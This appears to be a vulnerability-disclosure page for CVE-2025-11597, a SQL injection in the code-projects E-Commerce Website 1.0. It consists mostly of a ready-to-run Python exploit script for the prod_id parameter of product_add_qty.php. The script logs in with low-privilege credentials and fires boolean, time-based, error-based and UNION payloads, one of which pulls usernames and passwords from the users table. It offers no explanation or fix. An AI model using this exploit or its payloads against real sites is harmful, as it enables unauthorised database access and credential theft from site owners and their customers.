CVE-2025-11597：code-projects E-Commerce Website SQL注入漏洞

# CVE-2025-11597 SQL Injection PoC # Target: code-projects E-Commerce Website 1.0 # Vulnerable file: /pages/product_add_qty.php # Vulnerable parameter: prod_id import requests TARGET_URL = "http://target-site.com" VULNERABLE_ENDPOINT = "/pages/product_add_qty.php" # Authentication credentials (low privilege required) USERNAME = "test_user" PASSWORD = "test_password" def exploit_sql_injection(target_url, endpoint, prod_id_payload): """ Exploit SQL injection in prod_id parameter of product_add_qty.php """ session = requests.Session() # Step 1: Login to obtain session cookie (low privilege) login_url = f"{target_url}/pages/login.php" login_data = { "username": USERNAME, "password": PASSWORD } session.post(login_url, data=login_data) # Step 2: Send malicious request with SQL injection payload inject_url = f"{target_url}{endpoint}" params = { "prod_id": prod_id_payload } response = session.get(inject_url, params=params) return response.text # Example payloads if __name__ == "__main__": # Payload 1: Boolean-based blind SQL injection payload1 = "1' AND 1=1-- -" print("[+] Testing boolean-based blind SQLi...") result1 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload1) # Payload 2: UNION-based SQL injection to extract data payload2 = "1' UNION SELECT 1,username,password,4 FROM users-- -" print("[+] Testing UNION-based SQLi...") result2 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload2) # Payload 3: Time-based blind SQL injection payload3 = "1' AND SLEEP(5)-- -" print("[+] Testing time-based blind SQLi...") result3 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload3) # Payload 4: Error-based SQL injection payload4 = "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- -" print("[+] Testing error-based SQLi...") result4 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload4) print("[+] Exploitation complete. Review server responses for extracted data.")